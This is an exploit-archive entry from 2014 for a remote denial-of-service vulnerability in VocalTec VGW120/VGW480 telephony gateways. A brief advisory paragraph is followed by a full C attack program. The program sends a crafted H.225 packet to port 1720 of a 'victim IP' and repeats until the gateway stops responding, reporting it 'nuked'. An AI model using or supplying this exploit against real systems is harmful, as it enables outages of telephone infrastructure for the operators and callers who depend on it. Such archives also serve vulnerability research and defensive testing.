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VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 Denial of Service Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
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Vulnerability in VocalTec VGW120/VGW480 Telephony Gateway allows remote denial of service through H.225 protoco

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                                                source: http://www.securityfocus.com/bid/10411/info

It has been reported that the VocalTec VGW120 and VGW480 Telephony Gateways are prone to a remote denial of service vulnerability. The issue is reported to exist in the ASN.1/H.323/H.225 stack.

A remote attacker may exploit this issue to deny service to the affected appliances. 

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>

#define H323_SIGNAL_PORT 1720

unsigned char kill_buff[] = {\
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0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a};

int nuke_victim(char * ip)
{
 int sock;
 struct sockaddr_in vict_addr;
 
 if ((sock=socket(AF_INET, SOCK_STREAM, 0))==-1)
  {
  perror("nuke_victim()::socket()");
  return -1;
  }
 memset(&vict_addr, 0, sizeof(vict_addr));
 vict_addr.sin_family=AF_INET;
 inet_pton(AF_INET, ip, &vict_addr.sin_addr);
 vict_addr.sin_port=htons(H323_SIGNAL_PORT);
 if (connect(sock, (struct sockaddr *) &vict_addr, sizeof(vict_addr))==-1)
  {
  close(sock);
  if (errno==ECONNREFUSED) return 1;
  perror("nuke_victim()::connect()");
  return -1;
  }
 if (send(sock,kill_buff,sizeof(kill_buff),MSG_NOSIGNAL)!=sizeof(kill_buff))
  {
  close(sock);
  if (errno==EPIPE) return 1;
  perror("nuke_victim()::send()");
  return -1;
  }
 close(sock);
 return 0;
}

int main(int argc, char ** argv)
{
 int ret_flag=0;
 int try_count=0;
 if (argc<2)
  {
  fprintf(stderr, "Usage: %s <victim IP>\n", argv[0]);
  return 1;
  }
 while((ret_flag=nuke_victim(argv[1]))==0) 
  {
  try_count++;
  usleep(100000);
  }
 if (ret_flag==-1) printf("Execution aborted with internal error\n");
 if (ret_flag==1) printf("Victim %s successfully nuked with %d tryes\n", argv[1], try_count);
 return 0;
}


                              

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